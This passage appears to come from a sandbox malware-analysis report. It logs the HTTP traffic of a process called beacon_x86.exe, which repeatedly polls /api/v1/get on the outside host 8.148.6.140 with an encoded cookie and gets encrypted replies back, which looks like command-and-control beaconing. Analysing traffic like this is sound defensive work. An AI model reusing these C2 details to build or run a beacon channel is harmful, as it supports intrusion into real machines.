        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:23.015799999 CET529INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:22 GMT
        Server: nginx
        Content-Length: 344
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 57 36 5a 31 6e 43 2f 6c 74 65 72 55 57 42 38 4a 75 39 68 7a 70 58 63 6f 65 73 6a 54 33 68 6e 59 4b 6f 35 63 74 36 2b 49 55 51 43 4c 45 63 2f 31 53 6d 71 46 46 6c 4b 41 41 2f 37 4c 79 64 51 67 74 4f 74 31 49 6f 2b 5a 34 73 45 77 64 53 4c 66 72 34 33 37 49 74 32 4e 73 2b 6f 42 79 2f 57 61 45 71 50 73 66 33 52 72 4d 44 75 63 6b 58 76 58 57 6b 65 34 71 70 6a 74 62 6e 45 72 39 33 37 51 65 68 6e 61 58 44 42 63 71 77 52 38 57 39 64 61 39 73 6e 46 57 6f 39 74 42 42 4f 49 42 56 6e 69 57 62 61 5a 73 2b 70 2b 79 66 50 56 65 46 65 47 4e 51 33 47 53 51 56 54 48 67 47 39 6a 75 7a 31 6b 72 64 7a 4d 36 6e 62 72 52 2b 6d 48 4b 4e 62 6e 54 67 4c 49 61 59 4c 4f 77 6e 31 67 74 39 75 34 2f 37 34 78 6c 2b 56 71 67 49 6c 67 79 69 58 56 43 54 65 4f 66 4e 50 6d 4d 56 58 76 41 44 39 73 70 64 7a 2f 77 62 72 6a 35 35 32 45 6e 39 30 44 7a 58 63 6a 34 52 48 2b 6d 45 64 71 33 66 70 4f 7a 50 6f 4d 34 41 61 71 4c 47 48 52 6f 6c 77 59 64 79 2b 51 37 6e 65 35 69 4d 78 2f 4e 51 75 6c 47 69 30 66 58 5a 44 52 4f 47 71 4f 59 46 70 70 74 [TRUNCATED]
        Data Ascii: W6Z1nC/lterUWB8Ju9hzpXcoesjT3hnYKo5ct6+IUQCLEc/1SmqFFlKAA/7LydQgtOt1Io+Z4sEwdSLfr437It2Ns+oBy/WaEqPsf3RrMDuckXvXWke4qpjtbnEr937QehnaXDBcqwR8W9da9snFWo9tBBOIBVniWbaZs+p+yfPVeFeGNQ3GSQVTHgG9juz1krdzM6nbrR+mHKNbnTgLIaYLOwn1gt9u4/74xl+VqgIlgyiXVCTeOfNPmMVXvAD9spdz/wbrj552En90DzXcj4RH+mEdq3fpOzPoM4AaqLGHRolwYdy+Q7ne5iMx/NQulGi0fXZDROGqOYFpptcbcw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.8497138.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:23.149082899 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.2.8497178.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:27.563920975 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.2.8497188.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:31.684649944 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:32.670253038 CET569INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:32 GMT
        Server: nginx
        Content-Length: 384
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6f 41 4f 2f 63 44 73 6f 2b 4d 34 66 76 67 43 57 31 77 33 53 72 34 52 69 66 63 64 30 2f 73 35 38 41 39 62 79 79 6e 54 2f 47 4a 6c 51 54 70 4b 2b 46 41 64 75 55 41 68 76 4d 52 45 52 6d 32 4a 6a 4b 6f 63 56 66 2f 49 55 58 55 64 4f 35 37 53 53 4e 30 6e 39 42 62 58 4e 42 31 66 30 55 49 32 41 4c 54 6a 37 49 4b 7a 73 79 68 4f 6d 63 49 77 74 6e 56 75 6d 6f 73 6b 77 6c 31 51 5a 2b 65 4d 62 58 66 34 56 64 62 41 65 4b 31 69 51 5a 78 47 63 75 57 51 59 6c 31 31 34 36 73 39 59 50 6d 62 4b 2f 43 6e 6f 66 6d 66 68 75 74 77 2b 45 74 32 61 46 79 39 48 6d 53 41 63 54 42 46 39 45 54 61 31 59 7a 50 6e 64 2b 48 48 55 78 6b 62 6f 64 4d 6f 55 53 73 59 74 32 41 39 71 75 51 2f 6d 31 61 6a 63 74 59 32 46 64 71 2b 4f 4d 58 79 47 44 69 53 6c 48 61 4a 4b 6b 52 50 33 70 56 79 39 62 65 4e 32 4f 48 63 63 49 55 74 5a 74 43 4d 6a 58 4d 65 33 2f 63 79 63 72 72 49 50 47 34 6a 57 49 72 32 54 48 4e 2f 43 38 6f 6c 63 38 6c 79 6e 72 38 76 4a 42 6f 68 36 6a 2b 67 31 64 34 36 70 57 62 70 63 4d 66 30 68 68 31 74 45 65 75 39 31 77 41 41 52 68 [TRUNCATED]
        Data Ascii: oAO/cDso+M4fvgCW1w3Sr4Rifcd0/s58A9byynT/GJlQTpK+FAduUAhvMRERm2JjKocVf/IUXUdO57SSN0n9BbXNB1f0UI2ALTj7IKzsyhOmcIwtnVumoskwl1QZ+eMbXf4VdbAeK1iQZxGcuWQYl1146s9YPmbK/Cnofmfhutw+Et2aFy9HmSAcTBF9ETa1YzPnd+HHUxkbodMoUSsYt2A9quQ/m1ajctY2Fdq+OMXyGDiSlHaJKkRP3pVy9beN2OHccIUtZtCMjXMe3/cycrrIPG4jWIr2THN/C8olc8lynr8vJBoh6j+g1d46pWbpcMf0hh1tEeu91wAARhOXwha5lHJ3ub7e14HuhE/FbsIQIHgqXNHABCTE/BAMB9XB


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.2.8497198.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:32.795144081 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:35.131047964 CET248INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:34 GMT
        Server: nginx
        Content-Length: 64
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 43 2b 33 77 4f 78 62 6b 35 51 62 51 59 38 38 71 66 4d 7a 59 4e 59 2f 2b 7a 63 41 4d 5a 62 78 75 38 38 56 39 6e 5a 55 31 68 55 61 63 42 67 46 6f 44 32 46 54 7a 39 5a 57 6f 37 49 44 4d 32 72 54
        Data Ascii: C+3wOxbk5QbQY88qfMzYNY/+zcAMZbxu88V9nZU1hUacBgFoD2FTz9ZWo7IDM2rT


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        11192.168.2.8497208.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:35.247235060 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:36.224260092 CET441INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:36 GMT
        Server: nginx
        Content-Length: 256
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 43 54 45 4a 6a 7a 72 6e 6d 56 44 34 56 49 76 68 42 36 69 6e 38 71 54 57 4e 43 4f 71 38 4e 49 57 56 5a 48 37 75 56 46 55 4d 63 55 53 75 53 79 74 4a 42 52 62 45 6d 67 79 58 50 31 31 75 4f 45 35 48 49 37 52 70 44 2b 33 61 2b 65 59 30 47 44 4f 6c 4f 75 44 4b 30 5a 66 68 50 6b 55 4d 48 58 4d 6a 45 42 68 4b 32 6d 4e 57 53 4f 4b 4f 6f 32 75 6d 5a 6d 45 4e 51 7a 79 49 52 6e 46 4c 44 58 57 72 65 6a 79 4c 43 33 2b 55 70 64 74 58 5a 45 55 6c 73 6f 47 4c 33 6a 79 42 65 6d 43 77 4d 5a 39 74 2f 31 30 32 35 75 6e 34 37 57 2f 48 68 31 32 61 4a 78 4c 78 66 50 39 69 34 45 59 6b 33 53 75 7a 76 52 30 69 6e 46 35 30 32 73 57 79 58 35 30 37 63 78 4f 72 33 64 4b 75 2f 43 35 35 74 33 5a 70 4e 74 38 39 58 42 4b 34 45 4e 41 4f 4d 73 41 37 46 4d 45 56 59 6d 48 57 76 48 49 7a 63 67 4c
        Data Ascii: CTEJjzrnmVD4VIvhB6in8qTWNCOq8NIWVZH7uVFUMcUSuSytJBRbEmgyXP11uOE5HI7RpD+3a+eY0GDOlOuDK0ZfhPkUMHXMjEBhK2mNWSOKOo2umZmENQzyIRnFLDXWrejyLC3+UpdtXZEUlsoGL3jyBemCwMZ9t/1025un47W/Hh12aJxLxfP9i4EYk3SuzvR0inF502sWyX507cxOr3dKu/C55t3ZpNt89XBK4ENAOMsA7FMEVYmHWvHIzcgL


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        12192.168.2.8497218.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:36.340878010 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:37.354211092 CET465INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:37 GMT
        Server: nginx
        Content-Length: 280
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 71 73 63 6f 4a 2b 62 46 79 73 49 46 71 62 35 4d 75 71 35 70 2b 4c 65 4b 52 67 31 62 68 71 4e 58 34 56 30 2b 4d 53 78 6e 38 34 53 7a 6f 34 67 65 6e 2f 30 76 34 63 78 4d 6d 6b 34 7a 43 6b 63 6e 77 77 36 35 38 56 6e 46 79 43 69 54 64 70 33 52 65 65 7a 4f 72 32 59 30 5a 30 58 53 68 6c 4f 67 54 4e 46 6a 43 7a 36 4b 61 65 54 2b 62 34 57 53 63 79 45 4a 63 4b 54 63 45 6e 37 78 4e 38 5a 79 30 75 4a 45 78 41 47 79 47 71 45 47 57 55 6d 41 6e 2f 5a 4d 2b 2b 65 7a 69 58 6f 2f 34 34 75 62 4b 43 33 7a 75 6c 54 57 69 37 4b 63 33 5a 77 51 61 4b 43 78 50 62 69 55 4d 77 4f 47 35 49 42 63 44 39 68 41 6a 5a 55 36 34 31 64 37 69 53 34 62 55 4d 49 33 70 4d 7a 4a 49 61 55 54 6e 46 34 76 6e 49 79 74 6d 6a 73 55 56 39 49 52 30 6e 34 69 5a 32 79 50 74 6d 2f 45 53 73 7a 4b 72 65 63 4e 49 7a 47 44 6e 71 61 6b 78 76 44 50 78 66 4f 6f 6c 55 49 4b 30 77 3d 3d
        Data Ascii: qscoJ+bFysIFqb5Muq5p+LeKRg1bhqNX4V0+MSxn84Szo4gen/0v4cxMmk4zCkcnww658VnFyCiTdp3ReezOr2Y0Z0XShlOgTNFjCz6KaeT+b4WScyEJcKTcEn7xN8Zy0uJExAGyGqEGWUmAn/ZM++eziXo/44ubKC3zulTWi7Kc3ZwQaKCxPbiUMwOG5IBcD9hAjZU641d7iS4bUMI3pMzJIaUTnF4vnIytmjsUV9IR0n4iZ2yPtm/ESszKrecNIzGDnqakxvDPxfOolUIK0w==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        13192.168.2.8497228.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:37.466064930 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:38.461850882 CET248INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:38 GMT
        Server: nginx
        Content-Length: 64
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 43 38 69 73 74 2f 33 6b 55 6c 66 55 35 66 33 7a 52 69 68 45 4c 5a 6d 31 78 78 41 39 62 36 69 4b 74 65 76 43 58 4d 48 55 33 48 38 32 67 31 6c 4f 4d 44 56 6e 49 75 2b 2b 2b 78 42 4a 46 7a 54 36
        Data Ascii: C8ist/3kUlfU5f3zRihELZm1xxA9b6iKtevCXMHU3H82g1lOMDVnIu+++xBJFzT6


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        14192.168.2.8497238.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:38.575706959 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:39.527338028 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:39 GMT
        Server: nginx
        Content-Length: 152
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:26:39.527494907 CET152INData Raw: 36 61 48 59 46 6f 65 45 6e 48 53 59 6b 54 6d 59 74 61 72 42 51 34 52 59 31 36 73 33 38 5a 36 65 68 4e 73 62 59 73 43 61 2b 56 59 33 42 47 4b 4e 47 6b 73 57 52 70 6b 38 48 4f 36 4f 4e 58 53 44 32 6e 38 4f 6a 6d 6a 36 58 44 4d 56 61 35 50 4e 31 38
        Data Ascii: 6aHYFoeEnHSYkTmYtarBQ4RY16s38Z6ehNsbYsCa+VY3BGKNGksWRpk8HO6ONXSD2n8Ojmj6XDMVa5PN18pumvwHZzs0iszo8bGacQWYVkNLGzXCgq1OhOPXu2iexL3hXF41J4Q3ChrZ2xa8GYjTEw==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        15192.168.2.8497248.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:39.637844086 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:40.626804113 CET377INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:40 GMT
        Server: nginx
        Content-Length: 192
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 33 69 30 64 53 55 69 52 76 55 52 2b 42 77 77 75 69 49 41 37 6d 7a 75 66 31 59 70 4f 6f 31 74 49 45 6f 58 4d 59 72 45 61 2f 64 56 4f 44 77 42 76 4f 4e 56 4e 52 2f 52 2b 4e 53 4c 59 34 6c 32 65 34 4a 38 7a 39 68 64 2b 77 79 78 37 51 58 32 55 63 37 44 52 32 47 56 79 56 56 43 4e 46 48 6f 64 43 72 58 4c 6d 67 67 4f 32 59 32 65 38 4c 4b 35 37 69 4e 6a 62 4b 33 56 74 41 35 38 63 42 34 2b 53 41 78 64 74 30 2f 30 6d 39 41 58 74 4b 55 2b 61 56 2b 47 41 35 70 44 6d 36 56 7a 46 6e 37 56 6b 61 37 41 67 49 33 35 43 41 45 36 63 53 39 73 36 58 6c 59 50 62 6a 76 34 51 56 31 44 44 63 69
        Data Ascii: 3i0dSUiRvUR+BwwuiIA7mzuf1YpOo1tIEoXMYrEa/dVODwBvONVNR/R+NSLY4l2e4J8z9hd+wyx7QX2Uc7DR2GVyVVCNFHodCrXLmggO2Y2e8LK57iNjbK3VtA58cB4+SAxdt0/0m9AXtKU+aV+GA5pDm6VzFn7Vka7AgI35CAE6cS9s6XlYPbjv4QV1DDci


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        16192.168.2.8497258.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:41.027055025 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:41.966902971 CET248INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:41 GMT
        Server: nginx
        Content-Length: 64
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 52 43 4a 63 76 56 47 70 48 78 79 46 44 32 50 37 38 33 56 50 63 2f 48 6e 69 68 61 68 6a 59 4d 50 34 38 73 45 30 45 38 50 58 58 77 46 68 77 31 57 65 6a 39 31 73 45 53 41 66 31 6a 32 52 47 64 55
        Data Ascii: RCJcvVGpHxyFD2P783VPc/HnihahjYMP48sE0E8PXXwFhw1Wej91sESAf1j2RGdU


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        17192.168.2.8497268.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:42.075259924 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:43.667608023 CET272INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:43 GMT
        Server: nginx
        Content-Length: 88
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 58 74 54 64 2f 4c 78 43 4a 57 55 59 46 35 4c 77 78 52 64 6f 74 61 5a 4e 35 2f 43 37 59 59 44 38 31 4a 62 44 78 46 61 55 63 39 38 51 72 67 30 39 46 79 37 41 4c 32 71 38 2b 76 54 34 7a 76 47 51 44 75 78 35 62 67 54 46 37 42 70 63 79 32 72 39 7a 59 34 46 6c 41 3d 3d
        Data Ascii: XtTd/LxCJWUYF5LwxRdotaZN5/C7YYD81JbDxFaUc98Qrg09Fy7AL2q8+vT4zvGQDux5bgTF7Bpcy2r9zY4FlA==


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        18192.168.2.8497278.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:43.794128895 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:44.745846987 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:44 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:26:44.746009111 CET320INData Raw: 65 62 79 6a 55 74 46 2b 35 6c 69 59 70 6b 51 44 77 77 36 36 78 42 56 2b 52 76 5a 77 46 4e 6d 36 37 37 72 47 6e 6f 56 61 49 79 54 35 79 56 35 41 32 6c 6d 6c 7a 4f 70 2b 54 55 5a 59 62 49 59 66 55 45 59 34 6b 36 6a 41 64 42 55 50 6e 7a 38 4d 35 66
        Data Ascii: ebyjUtF+5liYpkQDww66xBV+RvZwFNm677rGnoVaIyT5yV5A2lmlzOp+TUZYbIYfUEY4k6jAdBUPnz8M5fjDs4pdfpVWXdmm+jauJUjRIvCcaNNJvdcfOTW3atNwXSgEi026i6n2GnaLpG8ktOCPMeCToJe90x5sXK+Ex+tkHyo2RTw7aMd23haXnK75G4ZmR71lLODLylVSk1sc0sVIWIRoGVQih5BQ7lGZLydtIWN9Jsc6qQY


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        19192.168.2.8497288.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:26:44.859091043 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:26:48.820684910 CET485INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:26:48 GMT
        Server: nginx
        Content-Length: 300
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
